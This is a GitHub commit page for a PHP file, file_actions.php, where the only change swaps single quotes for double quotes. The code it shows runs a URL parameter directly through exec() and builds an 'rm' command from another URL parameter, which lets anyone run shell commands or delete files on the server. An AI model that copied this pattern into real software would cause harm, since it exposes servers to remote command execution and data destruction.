Skip to content

Commit

Permalink
Comillas
Browse files Browse the repository at this point in the history
  • Loading branch information
wilsaav committed Apr 23, 2020
1 parent 5d30a31 commit ed6cad9
Showing 1 changed file with 4 additions and 4 deletions.
8 changes: 4 additions & 4 deletions file_actions.php
Original file line number Diff line number Diff line change
Expand Up @@ -16,14 +16,14 @@
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
if(isset($_GET['copia'])){
$cp=$_GET['copia'];
if(isset($_GET["copia"])){
$cp=$_GET["copia"];
exec($cp);
echo $cp;
}

if(isset($_GET['del'])){
$fileDel=$_GET['del'];
if(isset($_GET["del"])){
$fileDel=$_GET["del"];
$del="rm /$fileDel";
exec($del);
echo $del;
Expand Down

0 comments on commit ed6cad9

Please sign in to comment.